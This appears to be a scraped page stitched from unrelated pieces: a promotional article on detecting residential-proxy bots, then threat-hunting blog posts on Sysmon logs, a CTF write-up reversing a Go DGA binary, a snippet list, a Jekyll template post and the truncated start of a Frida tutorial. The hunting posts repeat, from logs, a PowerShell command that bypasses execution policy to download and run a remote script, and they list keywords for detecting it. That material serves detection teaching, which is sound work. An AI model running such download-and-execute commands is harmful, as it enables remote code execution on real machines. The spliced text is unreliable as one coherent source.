The Residential Proxy Problem Nobody Talks About Enough

Let me paint you a picture. Traditional bot detection works great when attackers use datacenter proxies. Those IPs stick out like a sore thumb—they’re from hosting providers, they share similar patterns, and honestly, blocking them feels like swatting flies. Easy.

But residential proxies? That’s a whole different beast. These connections come from real home internet connections, scattered across neighborhoods just like your legitimate users. When a bot routes through someone’s home router in suburban Ohio, how do you tell the difference between that and your actual customer from suburban Ohio? It’s maddening.

The worst part? Account takeover (ATO) attacks and fraudulent orders using these proxies cost businesses millions. And I’m not throwing that number around lightly. We’re talking real money disappearing because bots are essentially wearing digital disguises that make them look like your grandmother checking her email.

Enter ProxySentry.io (And Why It Actually Works)

Here’s where ProxySentry.io comes into play, and honestly, it’s about time someone tackled this problem head-on. What makes it different is that it doesn’t just look at IP addresses—that ship has sailed. Instead, it analyzes behavioral patterns, connection metadata, and a bunch of other signals that residential proxy users can’t easily fake.

Think about it this way: even if a bot is hiding behind a residential IP, it still behaves like a bot. It might make requests faster than humanly possible, or hit endpoints in sequences that no real user would follow. ProxySentry catches these patterns.

The API integration is surprisingly straightforward. You basically send over the IP address and some request context, and it returns a risk score. Something like:

{
  "risk_score": 85,
  "proxy_type": "residential",
  "indicators": [
    "unusual_velocity",
    "mismatched_timezone",
    "suspicious_asn_rotation"
  ]
}

What I really appreciate is that it doesn’t just scream “BOT!” and leave you hanging. You get actual context about why something seems fishy.

Setting Up Your Defense (Without Going Overboard)

Now, before you go blocking every suspicious request, let’s talk strategy. The key with residential proxy detection isn’t creating an impenetrable fortress—it’s adding smart friction at the right moments.

For login attempts, you might trigger additional verification when ProxySentry flags high-risk residential proxies. Maybe that’s a CAPTCHA, maybe it’s email verification. The point is, you’re not immediately slamming the door; you’re just asking them to prove they’re real.

With order fraud, it gets interesting. High-risk scores might trigger manual review for orders above certain amounts. Or you could delay order processing slightly—just enough to catch stolen credit card reports before shipping. Small friction, big protection.

Here’s a pattern I’ve seen work well: combine ProxySentry’s risk scores with your existing signals. Got a user logging in from a residential proxy with a risk score of 70+, trying to change the email address on an account that’s been dormant for six months? Yeah, that’s a red flag parade.

The Human Element You Can’t Ignore

Let’s be real for a second—some legitimate users do use VPNs and proxy services. Maybe they’re privacy-conscious, maybe they’re traveling, or maybe they just don’t trust their ISP. (Can you blame them?) This is why the nuanced approach ProxySentry takes matters so much.

You’re not just getting a binary “proxy/not proxy” response. You’re getting intelligence about the type of proxy, how it’s being used, and whether the behavior matches typical proxy abuse patterns. This lets you make informed decisions instead of playing whack-a-mole with IP addresses.

Making It Work in Production

Implementation-wise, you’ll want to start monitoring before blocking. Seriously, resist the urge to go full defensive mode on day one. Log everything for a week or two. Look at what would’ve been blocked. Check if any legitimate users would’ve been caught in the crossfire.

Most teams should integrate ProxySentry.io at a few key points: account creation, login, password reset, and checkout. These are your high-value targets for attackers, so they make sense as checkpoints. The API is fast enough that users won’t notice the extra milliseconds, but those milliseconds might save you from a world of hurt.

Remember, this isn’t about building a perfect system—perfect is the enemy of good enough. It’s about making your platform annoying enough for bot operators that they move on to easier targets. Because at the end of the day, that’s really what security is: being a harder target than the next guy.

In the past article, we used powershell scripting to filter the events and perform basic querying, in this article we will load sysmon logs into python, and explore some powerful queries that we can apply to our data to gain better understanding of it.

Exporting events to xml

The first step is to export sysmon events from the event log in xml format. This can be done either using get-winevent, or wevtutil. But, it seems that wevtutil is much faster .

This command uses wevtutil.exe to dump the logs to exported-eventlog.xml file on the desktop in XML format.

WEVTUtil query-events "Microsoft-Windows-Sysmon/Operational" /format:xml /e:events > ~/Desktop/exported-eventlog.xml

Or, this slower version that uses Get-WinEvent powershell command

 Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'} |Export-Clixml -Path ~/Desktop/exported-eventlog.xml

Make sure to run these commands as admin in order to export the logs properly.

Loading Events in python

Parsing XML files in python is easy, we just need to know which nodes/attributes are useful for us, this code snipper will load the xml file, iterate over each event, extract some data from each event, and then store load every thing in pandas dataframe.

import tabulate
from bs4 import BeautifulSoup
import pandas as pd

with open(r'exported-eventlog.xml', 'r' , encoding='utf16') as f:
    data = f.read()

parsed = BeautifulSoup(data, "xml")

events_list  = []
for event in parsed.find_all('Event'):
    evt_dict ={}
    evt_dict['EventID'] = event.find('EventID').text
    evt_dict['Computer'] = event.find('Computer').text
    evt_dict['EventRecordID'] = event.find('EventRecordID').text
    for j in event.find_all("Data"):
        evt_dict[j['Name']] = j.text
    events_list.append(evt_dict)

df = pd.DataFrame(events_list)
print('Loaded %d events' % len(df))

Usecase: Search for execution of .ps1 files

We can use python to do case insensitive searches in the data, in this example, we are using regex to search the “CommandLine” field for powershell executing ps1 script files.

filtered_df = df[(df['CommandLine'].notna()) & (df['CommandLine'].str.match('.*PoWeRSHeLl.*pS1.*',case=0))][['EventID','ProcessId','Image','CommandLine']]
print(tabulate.tabulate(filtered_df ,headers= filtered_df.columns))

And the result shows the execution of the exercise file we used in the last post.

        EventID    ProcessId  CommandLine
----  ---------  -----------  ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 115          1         3900  powershell.exe  -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/11x256/11x256.github.io/test/assets/exercise/th3/1.ps1'))

9082          1         7464  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -command "try { . \"c:\Users\abdo-pc\AppData\Local\Programs\Microsoft VS Code\resources\app\out\vs\workbench\contrib\terminal\browser\media\shellIntegration.ps1\" } catch {}"

Usecase: Create Process Tree

Another thing we can try now is to create a process tree to show the relationships between the processes. In order to create a process tree, we will need 2 things:

• identify root nodes, these nodes (processes) don’t have a parent, this can be either due to missing data, or because thats the first process created by the OS.
• Create list of children of each node: this will allow us to create the parent-child relationship

The firs step: Prepare the data

In this step will check what nodes are missing from our data ,and we will select a subset of filed to use in the process tree

# List to store all the nodes
nodes = []
# Dictionary to identify missing nodes
nodes_guids = {}
for i in df[df['EventID'] == "1" ].itertuples():
    node = {}
    node['Name'] = i.Image.split('\\')[-1]
    node['Cmd'] = i.CommandLine
    node['ProcessGuid'] = i.ProcessGuid
    node['ParentProcessGuid'] = i.ParentProcessGuid
    node['ProcessId'] = i.ProcessId

    nodes.append(node)
    nodes_guids[i.ProcessGuid] = 1 # set the node in the dict as available

The second step: Create the parent-child relationship

roots = []
children = {}

for i in nodes:
    if nodes_guids.get(i['ParentProcessGuid'] , 0 ) == 0:
        roots.append(i)
    else:
        if i['ParentProcessGuid']  not in children:
            children[i['ParentProcessGuid'] ] = []
        children[i['ParentProcessGuid'] ].append(i)

This code will create a list of roots, nodes without a parent in our set of data. And it will create a list of children for each parent

The third step: Print the tree

Now, we have every thing ready, we just need to print the data using recursion. Recursion is used in order to print the data in the required order, we need to print the root, then the first child, then the first child of the first child, and so on…

root
    child 1
        child 1 1
            child 1 1 1
        child 1 2
        child 1 3
            child 1 3 1
            child 1 3 2
    child 2
    child 3 
    ... 

Using a for loop to print the data , we will get in weird order for a process tree, which will look like this:

root
    child 1
    child 2
    child 3
    child 4
    child 1 1
    child 1 2
    child 3 1
    .... and so on

def print_node(node, indent =0):
    print(' '*indent , node['Name'] , node['ProcessId'])
    for j in children.get(node['ProcessGuid'] , []):
        print_node(j, indent=indent+4)
for i in roots:
    print_node(i)

Which would print something like this, based on what you choose to print

 mscorsvw.exe 1532
 mscorsvw.exe 5964
 chrome.exe 9320
     chrome.exe 6456
     chrome.exe 7568
     chrome.exe 940
     chrome.exe 10788
     chrome.exe 7448
     chrome.exe 3400
     chrome.exe 7060
     chrome.exe 5292
     chrome.exe 11128
     chrome.exe 4340
     chrome.exe 8556
     chrome.exe 8816
     chrome.exe 2052
     chrome.exe 5896
     chrome.exe 7016
     cmd.exe 5292
         conhost.exe 8224
     chrome.exe 768
     chrome.exe 9288
     chrome.exe 9716
     cmd.exe 4264
         conhost.exe 6736
    ....

Threat Hunting posts

• Part 1 - Installing sysmon
• Part 2 - Sysmon event structure
• Part 3 - Command line investigation
• Part 4- Loading sysmon events in python

In this article, we’ll explore Sysmon, install it, and ensure its working properly.

What is Sysmon?

Sysmon, short for System Monitor, is a powerful Windows system service and device driver that monitors and logs system activity to the Windows event log. Developed by Microsoft’s Sysinternals team, Sysmon provides detailed information about process creations, network connections, file modifications, registry modifications, and more. It is commonly used for security monitoring, threat detection, and forensic analysis on Windows systems.

Installing Sysmon

To install Sysmon on a Windows system, follow these steps:

1. Download Sysmon: Visit the official Sysinternals Sysmon page to download the latest version of Sysmon Download from here.

2. Extract the ZIP file: After downloading Sysmon, extract the contents of the ZIP file to a folder on your computer.

3. Open Command Prompt: Open Command Prompt with administrative privileges. You can do this by searching for “cmd” in the Start menu, right-clicking on “Command Prompt,” and selecting “Run as administrator.”

4. Navigate to the Sysmon directory: Use the cd command to navigate to the directory where you extracted the Sysmon files.

5. Install Sysmon: Run the following command to install Sysmon: sysmon.exe -i -accepteula This command installs Sysmon as a Windows service and accepts the end-user license agreement (EULA).

6. Verify installation: You can verify that Sysmon has been installed correctly by checking the Windows Event Viewer. On Vista and higher, events are stored in Applications and Services Logs/Microsoft/Windows/Sysmon/Operational Look for event logs with the source “Microsoft-Windows-Sysmon” to confirm that Sysmon is running and logging events. For example, i opened notepad.exe , and was able to find it in the sysmon logs.

Threat Hunting posts

• Part 1 - Installing sysmon
• Part 2 - Sysmon event structure
• Part 3 - Command line investigation
• Part 4- Loading sysmon events in python

In this article, we’ll explore the structure of process creation event (event_id == 1).

Process creation event

The process creation event, typically denoted as Event ID 1 in Sysmon, is a critical aspect of system monitoring and security analysis. When a new process is spawned on a Windows system, Sysmon captures and logs detailed information about this event, providing valuable insights into the execution of programs and potential security threats. Here’s a comprehensive description of the process creation event:

• Event ID: The event ID for process creation in Sysmon is 1. This ID serves as a unique identifier to differentiate process creation events from other types of events logged by Sysmon.

• Timestamp: The timestamp indicates the exact date and time when the process creation event occurred. This timing information is crucial for correlating events, establishing timelines during forensic investigations, and identifying patterns of suspicious activity.

• Process Information:
  • Process Name: The name of the newly created process, which provides insight into the executable or application being launched.
  • Process ID (PID): A unique identifier assigned to the newly created process by the operating system. PID helps in tracking and referencing the process throughout its lifecycle.
  • ProcessGuid: is a unique value for this process across a domain to make event correlation easier. PID is not unique, and it can be reused on the same,which can cause confusion in investigations. Thats why microsoft added the process guid field, which is a unique alternative to the PID.
  • Parent Process Name: The name of the parent process that initiated the creation of the new process. Understanding the parent process can reveal the origin of the execution chain.
  • Parent Process ID (PPID): The PID of the parent process. Knowing the PPID allows analysts to map the relationship between the parent and child processes.
  • ParentProcessGuid: Same as ProcessGuid, but for the parent process. Relying on PID and PPID to map relationships between process will not be accurate in all cases. GUIDs should be used instead.
  • Command Line: The command line parameters used to launch the new process, if available. Command line information provides additional context about the execution environment and potential malicious intent.
  • Hash of the Executable File: The cryptographic hash (e.g., SHA-256) of the executable file corresponding to the new process. Hash values enable file integrity verification and facilitate the identification of known malware or suspicious binaries.
• Security Information:
  • User: The user account under which the new process was created. User context is essential for determining privileges, permissions, and potential unauthorized activity.
  • Logon ID: A unique identifier associated with the user’s logon session. Logon ID helps in linking process creation events to specific user sessions, aiding in user attribution and accountability.

Example of a process creation event

Lets use this command to get one event with event_id ==1 (process creation event).
(Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} -MaxEvents 1).message This would print output like this:

Process Create:
RuleName: -
UtcTime: 2024-02-22 00:02:08.800
ProcessGuid: {e3b07ee5-8f00-65d6-e605-000000000400}
ProcessId: 4736
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
FileVersion: 121.0.2277.128
Description: Microsoft Edge
Product: Microsoft Edge
Company: Microsoft Corporation
OriginalFileName: msedge.exe
CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault59f0370dh8777h49afh8f81h26e48962a41d
CurrentDirectory: C:\Windows\ImmersiveControlPanel\
User: DESKTOP-D3OJRQ4\abdo-pc
LogonGuid: {e3b07ee5-78ab-65d6-a79d-020000000000}
LogonId: 0x29DA7
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=09246B7D443CA032967573CE80EE41F96ECFDBF9B2F8EBCE7B8EB5C3E89C831B
ParentProcessGuid: {e3b07ee5-78ad-65d6-5200-000000000400}
ParentProcessId: 3688
ParentImage: C:\Windows\System32\sihost.exe
ParentCommandLine: sihost.exe
ParentUser: DESKTOP-D3OJRQ4\abdo-pc
PS C:\Users\abdo-pc\Downloads\Sysmon> 

Some of the fields in the output are more important than other from the prespective of threat hunting, for example, commandline can have valuable information , as we will see in the next post.

Threat Hunting posts

• Part 1 - Installing sysmon
• Part 2 - Sysmon event structure
• Part 3 - Command line investigation
• Part 4- Loading sysmon events in python

In this article, we’ll look at Mitre technique T1059.001 Command and Scripting Interpreter: PowerShell. We will download and execute a batch file T1105: Ingress Tool Transfer, and we will look at sysmon logs to see the articats created from such activity.

Overview of T1059.001

T1059.001 is categorized under the Execution tactic in the MITRE ATT&CK framework. It involves the use of command-line interfaces (CLIs) or scripting interpreters to execute commands or scripts, which can be leveraged by adversaries for various purposes, including lateral movement, privilege escalation, and data exfiltration. Common command-line interfaces and scripting interpreters utilized by adversaries include PowerShell, Command Prompt (cmd.exe), Bash, Python, and others.

Execution

The exercise file can be downloaded from here. its a simple batch script that will download a powershell script from github. This powershell script will run notepad.exe if it gets downloaded and executed successfully.

Hunting Queries

So, to find such technique in sysmon logs, we can try a few different things:

• Identify newly downloaded files, and search for any process creation events that involves any one of those files
  • We cannot run this query right now, as sysmon is not logging filewrites by default.
• Search for executed files that are stored in the downloads folder
  • Assuming that attackers will not move the downloaded file to another location
• Search for powershell process with url patterns in the command line
• Search for process where the parent process is web browser
  • This behaviour will exist if the attacker download and executed the file from within the browser

Query 1: Files executed from within the downloads folder

To search for events matching this rule, we will use powershell to filter sysmon events. In order to do that, we can use the CommandLine field in sysmon process creation event as follows. Make sure to run in powershell with admin rights.

$logs= Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1}

foreach ($log in $logs){
    $conditions_matched = 0
    foreach($line in ($log.message -split '\n'))
    {

        if (($line.StartsWith("CommandLine")) -and ($line -match ".*\\downloads\\.*" ) ){
            $conditions_matched +=1
        }
    }
    if ($conditions_matched -eq 1 ){
        echo $log.Message
        echo "***************************************************"}
}

This command prints this output on my device, i added these arrows manually, its not part of the output of the script.

Process Create:
RuleName: -
UtcTime: 2024-03-05 00:35:34.450
ProcessGuid: {e3b07ee5-68d6-65e6-3702-000000000800}
ProcessId: 5292
Image: C:\Windows\System32\cmd.exe                                                            <<<<<<<<<<<<<< 
FileVersion: 10.0.19041.3636 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\abdo-pc\Downloads\1.bat" "              <<<<<<<<<<<<<<
CurrentDirectory: C:\Users\abdo-pc\Downloads\
User: DESKTOP-D3OJRQ4\abdo-pc
LogonGuid: {e3b07ee5-674d-65e6-52f1-100000000000}
LogonId: 0x10F152
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=265B69033CEA7A9F8214A34CD9B17912909AF46C7A47395DD7BB893A24507E59
ParentProcessGuid: {e3b07ee5-68c0-65e6-1902-000000000800}
ParentProcessId: 9320
ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe                              <<<<<<<<<<<<<<
ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" 
ParentUser: DESKTOP-D3OJRQ4\abdo-pc
***************************************************

As shown in the output above, ParentImage chrome.exe executed cmd.exe in order to run 1.bat file, which is stored in the downloads folder. Also, we can see that the process Image (cmd.exe) is not stored in the downloads folder, its the script that is getting execute that is stored in the downloads folder.

Query 2: Search for powershell processes with urls in command line

The script for this hunt will use the same fields from the previous hunt. We will search for powershell.exe process with the word “http” in the command line.

$logs= Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1}

foreach ($log in $logs){
    $conditions_matched = 0
    foreach($line in ($log.message -split '\n'))
    {
        if (($line.StartsWith("Image")) -and ($line -match ".*powershell.exe.*" ) ){
            $conditions_matched +=1
        }
        if (($line.StartsWith("CommandLine")) -and ($line -match ".*http.*" ) ){
            $conditions_matched +=1
        }
    }
    if ($conditions_matched -eq 2 ){
        echo $log.Message
        echo "***************************************************"}
}

Output would look like this:

Process Create:
RuleName: -
UtcTime: 2024-03-05 00:36:25.625
ProcessGuid: {e3b07ee5-6909-65e6-5602-000000000800}
ProcessId: 3900
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe                          <<<<<<<<<<<<<<
FileVersion: 10.0.19041.3996 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe  -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/11x256/11x256.github.io/                                                               
test/assets/exercise/th3/1.ps1'))
CurrentDirectory: C:\Users\abdo-pc\Downloads\
User: DESKTOP-D3OJRQ4\abdo-pc
LogonGuid: {e3b07ee5-674d-65e6-52f1-100000000000}
LogonId: 0x10F152
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=9785001B0DCF755EDDB8AF294A373C0B87B2498660F724E76C4D53F9C217C7A3
ParentProcessGuid: {e3b07ee5-6909-65e6-5402-000000000800}
ParentProcessId: 4264
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\abdo-pc\Downloads\1.bat" "     <<<<<<<<<<<<<<
ParentUser: DESKTOP-D3OJRQ4\abdo-pc
***************************************************

The output indeeds looks very suspicious, we can see a url pointing to a .ps1 file hosted on github, we can also see some suspicious keywords like:

• bypass
• IEX
• WebClient
• DownloadString

All of these keywords are required for the attack to be successful and the are very commonly used to identify this type of attack. As can be seen here in azure sentinel repo of threat hunting rules.

Query 3: Search for powershell processes with urls in command line

For this one we will use ParentImage and CommandLine fields as follows:

$logs= Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1}

foreach ($log in $logs){
    $conditions_matched = 0
    foreach($line in ($log.message -split '\n'))
    {
        if (($line.StartsWith("ParentImage")) -and ($line -match ".*chrome.exe" ) ){
            $conditions_matched +=1
        }

    }
    if ($conditions_matched -eq 1 ){
        echo $log.Message
        echo "***************************************************"}
}

This one will produce some false positives, as usually browsers create many processes to check for updates and distribute workload. But, still a good way to collect potentially sucpicious processes.

Process Create:
RuleName: -
UtcTime: 2024-03-05 00:36:25.250
ProcessGuid: {e3b07ee5-6909-65e6-5402-000000000800}
ProcessId: 4264
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.19041.3636 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\abdo-pc\Downloads\1.bat" "
CurrentDirectory: C:\Users\abdo-pc\Downloads\
User: DESKTOP-D3OJRQ4\abdo-pc
LogonGuid: {e3b07ee5-674d-65e6-52f1-100000000000}
LogonId: 0x10F152
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=265B69033CEA7A9F8214A34CD9B17912909AF46C7A47395DD7BB893A24507E59
ParentProcessGuid: {e3b07ee5-68c0-65e6-1902-000000000800}
ParentProcessId: 9320
ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe
ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" 
ParentUser: DESKTOP-D3OJRQ4\abdo-pc
***************************************************

Handling False positives is a regular task in threat hunting, for example, we can fine tune this rule by filtering for extra fields to reduce FPs, like removing entries where both the parent and the child is chrome.exe.

Extra Task:

Lets also check the behaviour of the .ps1 file that got download from github. We can do that by finding all processes created where the parent is the powershell process that executed that .ps1 file.

$logs= Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1}

foreach ($log in $logs){
    $conditions_matched = 0
    foreach($line in ($log.message -split '\n'))
    {

        if (($line.StartsWith("ParentCommandLine")) -and ($line -match ".*ps1" ) ){
            $conditions_matched +=1
        }
    }
    if ($conditions_matched -eq 1 ){
        echo $log.Message
        echo "***************************************************"}
}

Output:

Process Create:
RuleName: -
UtcTime: 2024-03-05 00:36:29.969
ProcessGuid: {e3b07ee5-690d-65e6-5a02-000000000800}
ProcessId: 1824
Image: C:\Windows\System32\notepad.exe                          <<<<<<<<<<
FileVersion: 10.0.19041.3996 (WinBuild.160101.0800)
Description: Notepad
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: NOTEPAD.EXE
CommandLine: "C:\Windows\system32\notepad.exe"                  <<<<<<<<<<
CurrentDirectory: C:\Users\abdo-pc\Downloads\
User: DESKTOP-D3OJRQ4\abdo-pc
LogonGuid: {e3b07ee5-674d-65e6-52f1-100000000000}
LogonId: 0x10F152
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=CB448EA83BCF46A21AA9A9B258F39C85DF962B18AE3682F2AAAC9D79E2C04EBD
ParentProcessGuid: {e3b07ee5-6909-65e6-5602-000000000800}
ParentProcessId: 3900
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe  -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/11x256/11x256.gith
ub.io/test/assets/exercise/th3/1.ps1'))
ParentUser: DESKTOP-D3OJRQ4\abdo-pc
***************************************************

Threat Hunting posts

• Part 1 - Installing sysmon
• Part 2 - Sysmon event structure
• Part 3 - Command line investigation
• Part 4- Loading sysmon events in python

I will begin a new series of blog posts where I engage in threat hunting using sysmon logs. Throughout the process, I will utilize free tools and Python to conduct the hunts. The objective is to document and share my previous knowledge and insights.

Stay tuned.

EG-CTF 2019 was held on 15-Nov-2019, most of the challenges were written by people working at EG-CERT, this challenge is not one of those challenges, as I am not working at EG-CERT anymore .

This challenge was not solved during the competition, which is quite sad, I designed it to take some effort, however, the duration of the CTF was sufficient, as you will see from the writeup.

Problem statement

This file has a DGA, we want to know when the following domain is/was contacted "egT.fAErxJ.dGS.chq.mABcfYnHI.atPhIX.dgR.org". Submit the flag using the following format: EGCTF{unix timestamp} .

For example: if it contacted the domain on Thursday January 1 1970 12:00:00 AM GMT+0, submit EGCTF{0}

Tip: use https://www.epochconverter.com to create the timestamp, and use GMT timezone if needed.

https://github.com/11x256/11x256.github.io/blob/master/binaries/ch2

The challenge is written in GO, which is a “modern” programming language by Google. This is what encouraged me to learn it, I wanted to see what is a “modern” programming language, probably you should too :D.

The difficulty of the challenge comes from the fact that it is compiled for ARM 64 architecture. This architecture is not commonly used in CTFs, which means that not many players have experience dealing with it. Also the symbols are stripped from the binary, so the first step will be to find the main function.

Before taking the first step, lets run the binary. But how can we run a binary for a different architecture? The answer is to buy another device(Raspberry PI or android device) or use QEMU.

You can search for a tutorial on how to run an ARM64 machine using QEMU, or use an android VM from android studio, which is the fastest solution, I guess.

Now, we have to push the binary to the device and execute it using the following commands:

adb push ch /data/local/tmp
adb shell

The following commands are executed on the android device.

chmod u+x /data/local/tmp/ch2
/data/local/tmp/ch2

You will notice that the binary takes a few seconds before printing the generated domain. This delay is intentional, and it is added to prevent players from solving it using a black box approach:wink:.

You can execute it a few times, and you will notice that the output changes in every time. Now, lets move to the first step.

Finding the main function

If the binary was not stripped, you would find a method named “main.main”, which is the main function. But since it is stripped, we will need to make some effort in order to find it.

We will do a very simple thing, we will write a hello world program in go, compile it for ARM64 and keep the symbols.

package main
import "fmt"

func main(){
	fmt.Println("test")
}

env GOOS=linux GOARCH=arm64 go build test.go

We can add another small step here. We will find out the version of go used to compile the binaries.

go version
go version go1.13.1 windows/amd64

The result shows that we have version 1.13.1 on a windows machine and yes I am not the hacker who does not use windows :wink:.

We can use strings.exe, grep.exe to search for the version number in the challenge binary.

λ strings.exe ch2 | grep "go1."
        stack=[asimdfhmasimdrdmcgocheckfault   go1.13.1lr      no anodepc      r0      r1      r10     r11     r12     r13     r14     r15     r16     r17     r18     r19     r2      r20     r21
     r22     r23     r24     r25     r26     r27     r28     r29     r3      r4      r5      r6      r7      r8      r9      readlinkrunnableruntime.scavengesp      unknown( (forced) -> node= blocked= defersc= in use)

As you can see from the output that the version numbers are identical, I did not try with different versions, maybe you can try that and see if you will obtain the same results.

Now, lets open the 2 binaries in IDA, the one we built with symbols and the challenge.

On the left side you can see that IDA identified 1847 functions with their names, and on the right side, only 1153 without names (symbols).

Luckily, the main function is the last function in both of the two binaries, sub_9f320 is the “main.main” in the stripped binary, so easy🤦‍♂️.

But, lets ignore the previous line, and try to identify it using a more effective method. We will compare the two binaries, and we will try to identify the functions that are present in both of them, our target should be “fmt.Println”, or other IO functions that can print to the stdout as we saw when we ran the binary on the android emulator.

Diaphora is a great plugin for IDA that can do this function matching for us. Sadly, the plugin could not match our target function “fmt.Println”, but it matched “fmt.doPrintln” with a matching ratio of 98%.

So now we know where is “fmt.doPrintln” in the stripped binary.

​

By checking the cross references of “fmt.doPrintln” in the test binary, we can see that is called by only one function (“fmt.Println”), our target function. Also by checking the cross references of “sub_9EEB0” in the stripped binary, we can see that it is also called by one function, which must be “fmt.Println”, at least we are 98% sure of that.

Now by cross referencing the target function in the stripped binary, we find that it is called from only one function, and that function is not called from any other functions, so it is probably the “main.main” function.

Reversing the main function

I am not that good with ARM architecture, so I will keep try to finish this part as soon as possible, my target in this step is to try to figure out why does the binary take a few seconds to execute. If I can make it execute fasters, then solving it using a blackbox approach will be feasible.

These blocks are the counter measures added to prevent the blackbox approach, a basic for loop that will loop for 1903712550 times, in each iteration it does nothing. X0 is a register and is used as the loop counter, and its value is overwritten as soon as the loop ends, so this loop is a dead code.

In order to get rid of it, I swapped the registers order in the CMP instruction, so that the loop will not execute any iterations, as you can see from the comments added automatically by keypatch plugin.

There are 7 other loops like this in the binary, patch them all ,save the new binary and close IDA, we are done reversing for now.

Blackbox approach

If you run the patched binary on the android emulator, you will see that it now executes in less than a second. Which means that we can try to bruteforce the flag.

Also, you should have noticed that the output consists of 8 parts separated by dots, and that only a few parts change every time. Since we know that the binary behaves like a DGA, we can assume that the parts that change represent the current second, and the other parts represent the rest of the units of time (minutes, hours , days, months, years). We do not care about the fractions of a second, because they are not represented by the Unix timestamp.

We can execute the bruteforce attack using DBI ( https://en.wikipedia.org/wiki/DynamoRIO ), emulation ( https://www.unicorn-engine.org/ ) or by running the program on the target device.

The first two methods will require more analysis of the binary in order to find what function is called to get the current timestamp, which is doable using the same approach we used to find the main function.

I will use the latter method, because it is the easiest method, I wrote a python script that will automate that process. The script will generate pairs of commands, the first command will set the time on the device, the second command will run the binary and log the output. Then the output will be inspected manually to determine whether the attack was successful or not.

cmd1 = "date 010203042019.xx >> /data/local/tmp/res"
cmd2 = "/data/local/tmp/ch2_patched >> /data/local/tmp/res"

res = []

fout = open( r"E:\temp\eg-ctf\rev-egctf\go_dough\writeup\aa.sh" , 'w')
for i in range(0, 60 ,1):
    res.append(cmd1.replace("xx" , "%02d" % i))
    res.append(cmd2)

fout.write(" && ".join(res))
fout.flush()
fout.close()

date command will set the date, we will start by bruteforcing the value of the seconds field. Hopefully we will get a correct result. The python script produces 60 pairs to try all the possible values of the seconds field, and the output will be appended to /data/local/tmp/res file.

This is a snippet of the result of bruteforcing the seconds field, as you can see, more than one part changes based on the value of the seconds filed, but the first part depends exclusively on the value of the seconds field, you can verify that by changing the other fields and checking whether the first part will change or not.

So the correct value for the seconds field is : 3. Now repeat the same steps until you get the rest of the fields.

second == 3
minute == 44
hour == 6 - 1
day == 21 
month == 3
year == 2055

Remember that the hour field will change based on the timezone of your device.

flag : EGCTF{2689220643}

This is post will host things that i usually write from scratch every time i need them.

POWERSHELL

• Read sysmon logs

  Get-winevent -logname "Microsoft-Windows-Sysmon/Operational"
  

IDA PYTHON

PYTHON 3

XOR data in file with a key.

def xor_file(file_path, key_bytes):
	fin = open(file_path, 'rb')
	temp = bytearray(fin.read())
	fin.close()
	# if the key is of type "string"
	if type(key_bytes) == type(""):
		#convert ascii string to bytes
		key_bytes = list(map(ord , key_bytes))

	for i in range(len(temp)):
		temp[i] ^= key_bytes[i % len(key_bytes)]
	return temp


print(xor_file('a.bin' , 'AAAA1234'))

To add new posts, simply add a file in the _posts directory that follows the convention YYYY-MM-DD-name-of-post.ext and includes the necessary front matter. Take a look at the source for this post to get an idea about how it works.

Jekyll also offers powerful support for code snippets:

def print_hi(name)
  puts "Hi, #{name}"
end
print_hi('Tom')
#=> prints 'Hi, Tom' to STDOUT.

Check out the Jekyll docs for more info on how to get the most out of Jekyll. File all bugs/feature requests at Jekyll’s GitHub repo. If you have questions, you can ask them on Jekyll Talk.

In this post we will hook Java’s Crypto library using frida to acquire the data in clear text and the decryption/encryption keys from an android app.

Example #5

package com.example.a11x256.frida_test;

import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.util.Base64;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;

import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.UnsupportedEncodingException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;

import javax.crypto.BadPaddingException;
